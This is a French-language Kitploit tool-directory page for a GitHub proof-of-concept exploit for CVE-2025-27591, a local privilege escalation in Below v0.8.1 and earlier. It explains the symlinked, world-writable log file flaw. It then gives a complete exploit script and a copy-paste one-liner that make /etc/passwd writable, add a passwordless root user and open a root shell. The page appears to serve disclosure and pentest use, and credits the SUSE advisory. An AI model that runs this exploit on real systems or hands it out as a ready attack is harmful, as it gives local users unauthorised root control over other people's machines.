Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-27591 — Below v0.8.1 - Élévation de privilèges locaux (CVE-2025-27591) - Exploit PoC | Kitploit
Outils/GitHubGitHub/rvzsec/cve-2025-27591
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionRed Teaming
GitHubrvzsec/cve-2025-27591

CVE-2025-27591

Below v0.8.1 - Élévation de privilèges locaux (CVE-2025-27591) - Exploit PoC

Voir le dépôt
321il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Below - Escalade de privilèges locale (CVE-2025-27591)



below-logo

Below <= v0.8.1
Escalade de privilèges locale via un lien symbolique de journal modifiable en écriture mondiale
Exploit PoC




Introduction

Les versions de Below <= 0.8.1 contiennent une vulnérabilité critique d'escalade de privilèges locale (CVE-2025-27591).
En raison d'un répertoire de journaux mal configuré et accessible en écriture mondiale (/var/log/below/) et d'une logique de permissions inadéquate dans le code Rust, un attaquant local peut créer un lien symbolique error_<user>.log pointant vers n'importe quel fichier appartenant à root, comme /etc/passwd.

Lorsque below snapshot est exécuté avec sudo, il force le mode 0666 sur le fichier journal et y écrit, même s'il s'agit d'un lien symbolique.
Cela permet l'injection d'un utilisateur privilégié root sans mot de passe, menant à un accès complet à un shell root.


Utilisation

root@kitploit:~
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh

OU

Code de l'exploit

root@kitploit:~
# Title  : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage  : usage: ./exploit.sh


u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry  to /etc/passwd (now writable)
su pwn

Remarque : exploit.sh a été ajouté au README.md après qu'IppSec a utilisé la commande unique au lieu de exploit.sh dans son tutoriel. J'ai pensé que ce serait plus simple pour tout le monde. Merci IppSec. ^^

OU

Commande unique - (Copiez, collez et exécutez)

root@kitploit:~
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn

Environnement

  • Below <= v0.8.1
  • Linux géré par Systemd (Ubuntu, Arch, Fedora, etc.)
  • Utilisateur dans le groupe sudo avec accès NOPASSWD à /usr/bin/below *

Crédits

Découverte et signalée par Matthias Gerstner @ SUSE - Avis de sécurité
Exploit PoC - Ravindu Wickramasinhge alias rvz

Télécharger l’outil